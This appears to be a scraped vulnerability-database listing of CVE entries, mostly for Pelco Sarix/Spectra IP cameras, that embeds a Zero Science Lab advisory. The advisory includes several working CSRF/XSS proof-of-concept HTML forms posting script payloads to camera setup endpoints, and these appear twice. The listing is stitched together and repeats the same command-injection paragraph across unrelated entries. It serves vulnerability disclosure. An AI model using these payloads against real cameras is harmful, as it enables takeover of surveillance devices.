<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1040 | CVE-2018-7828 | Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera contain a cross-site request forgery vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Pelco Sarix/Spectra Cameras are cameras from Pelco. Schneider Electric Pelco Sarix/Spectra Cameras have multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. The Schneider Electric 1st Gen Pelco Sarix Enhanced Camera and Schneider Electric Spectra Enhanced PTZ Camera are products of Schneider Electric. The Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras. The Schneider Electric Spectra Enhanced PTZ Camera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and escape sequence to the system shell.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201803-1843 | CVE-2018-7236 | Schneider Electric Pelco Sarix Professional Authentication vulnerability |
CVSS V2: 5.8 CVSS V3: 8.1 Severity: HIGH |
A vulnerability exists in Schneider Electric's Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable the SSH service due to a lack of authentication for /login/bin/set_param. Schneider Electric Pelco Sarix Professional contains an authentication vulnerability. Information may be obtained and information may be altered. Pelco Sarix/Spectra Cameras are cameras from Pelco. Schneider Electric Pelco Sarix/Spectra Cameras have multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. Schneider Electric Pelco Sarix Professional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in Schneider Electric Pelco Sarix Professional with firmware prior to 3.29.67, caused by the program failing to require authentication for /login/bin/set_param. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and an escape sequence to the system shell. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown, MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980), Lighttpd/1.4.28, PHP/5.3.0.
| VAR-201905-1041 | CVE-2018-7829 | Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Vulnerable to improper neutralization of special elements in data query logic |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera contain a vulnerability in improper neutralization of special elements of data query logic. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Pelco Sarix/Spectra Cameras are cameras from Pelco. Schneider Electric 1st Gen Pelco Sarix Enhanced Camera and Schneider Electric Spectra Enhanced PTZ Camera are products of Schneider Electric. Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras. The Schneider Electric Spectra Enhanced PTZ Camera is a series of spherical IP cameras. Security vulnerabilities exist in Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and an escape sequence to the system shell. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown, MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980), Lighttpd/1.4.28, PHP/5.3.0.
| VAR-201707-1351 | No CVE | Parallels Desktop Virtual Machine Privilege Escalation Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Parallels Desktop is the most powerful virtual machine software for Mac computers.
Parallels Desktop has a local privilege elevation vulnerability that allows an attacker to escape from the virtual machine to the host and execute arbitrary code.
| VAR-201707-0666 | CVE-2017-1285 | IBM WebSphere MQ Vulnerable to sending crafted messages |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: Medium |
IBM WebSphere MQ 9.0.1 and 9.0.2 could allow an authenticated user with authority to send a specially crafted message that would cause a channel to remain in a running state but not process messages. IBM X-Force ID: 125146. Multiple IBM Products are prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause a denial-of-service condition.
| VAR-201905-1050 | CVE-2018-7826 | Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Command injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Pelco Sarix/Spectra Cameras are cameras from Pelco. Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that externally supplied input is used to construct executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and an escape sequence to the system shell. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown, MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980), Lighttpd/1.4.28, PHP/5.3.0.
| VAR-201905-1022 | CVE-2018-7816 | Pelco Sarix Enhanced Camera Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 5.5 CVSS V3: 6.5 Severity: MEDIUM |
A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera contains vulnerabilities related to authorization, permissions, and access control. Information may be tampered with. Pelco Sarix/Spectra Cameras is a camera line from Pelco. Schneider Electric Pelco Sarix/Spectra Cameras have multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures in the network system or product. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and an escape sequence to the system shell. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown, MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980), Lighttpd/1.4.28, PHP/5.3.0.
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
XSS vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP-TLS" />
<input type="hidden" name="inner_auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous_id" value=" " />
<input type="hidden" name="ca_certificate" value="test" />
<input type="hidden" name="client_certificate" value="test" />
<input type="hidden" name="private_key" value="test" />
<input type="hidden" name="private_key_password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http_port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip_address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2_community_string" value="public" />
<input type="hidden" name="v2_receiver_address" value="" />
<input type="hidden" name="v2_trap_community_string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable_leds" value="on" />
<input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp_server_from_dhcp" value="false" />
<input type="hidden" name="ntp_server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable_time_overlay" value="on" />
<input type="hidden" name="enable_name_overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date_format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay_sentinel" value="relay_sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email_to" value="" />
<input type="hidden" name="email_from" value="" />
<input type="hidden" name="email_subject" value="" />
<input type="hidden" name="email_message" value="" />
<input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="limit_size" value="" />
<input type="hidden" name="limit_size_scale" value="K" />
<input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" />
<input type="hidden" name="relay_bankName" value="GPIO" />
<input type="hidden" name="relay_index" value="0" />
<input type="hidden" name="relay_on_time" value="0.1" />
<input type="hidden" name="relay_off_time" value="0.1" />
<input type="hidden" name="relay_pulse_count" value="" />
<input type="hidden" name="filter_start0" value="" />
<input type="hidden" name="filter_stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
| VAR-201905-1049 | CVE-2018-7825 | Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Command Injection Vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Pelco Sarix/Spectra Cameras is a camera line from Pelco. Schneider Electric 1st Gen Pelco Sarix Enhanced Camera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data is used to construct executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. The POST parameter 'enable_leds' located in the update() function called via the GeneralSetupController.php script is not properly sanitised before being used in the writeLedConfig() function to set the LED state to on or off. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges, using a specially crafted request and an escape sequence to the system shell. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown, MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980), Lighttpd/1.4.28, PHP/5.3.0.
| VAR-201708-1052 | CVE-2017-11105 | OnePlus 2 Primary Bootloader Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The OnePlus 2 Primary Bootloader (PBL) does not validate the SBL1 partition before executing it, although it contains a certificate. This allows attackers with write access to that partition to disable signature validation. OnePlus 2 Primary Bootloader (PBL) contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). OnePlus 2 is a smartphone from OnePlus of China. The Primary Bootloader (PBL) is one of its main boot loaders. A security hole exists in the OnePlus 2 PBL. An attacker could exploit the vulnerability to turn off signature verification.
| VAR-201707-0901 | CVE-2017-6729 | Cisco StarOS and VPC Software for Cisco ASR 5000 Series Routers BGP processing function BGP process reload vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the Border Gateway Protocol (BGP) processing functionality of the Cisco StarOS operating system for Cisco ASR 5000 Series Routers and Cisco Virtualized Packet Core (VPC) Software could allow an unauthenticated, remote attacker to cause the BGP process on an affected system to reload, resulting in a denial of service (DoS) condition. This vulnerability affects the following products if they are running the Cisco StarOS operating system and BGP is enabled for the system: Cisco ASR 5000 Series Routers and Cisco Virtualized Packet Core Software. More Information: CSCvc44968. Known Affected Releases: 16.4.1 19.1.0 21.1.0 21.1.M0.65824. Known Fixed Releases: 21.3.A0.65902 21.2.A0.65905 21.1.b0.66164 21.1.V0.66014 21.1.R0.65898 21.1.M0.65894 21.1.0.66030 21.1.0. The vendor has confirmed this vulnerability and released it as Bug ID CSCvc44968. The BGP process may reload, resulting in a denial of service (DoS) state. The Cisco ASR 5000 Series is a carrier-grade platform for deploying high-demand 3G networks and migrating to Long Term Evolution (LTE). A security vulnerability exists in the Cisco ASR 5000 Series Router. A remote attacker can cause a denial of service by sending a specific TCP packet to the StarOS Border Gateway Protocol (BGP) service.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCvc44968. StarOS is an operating system used in it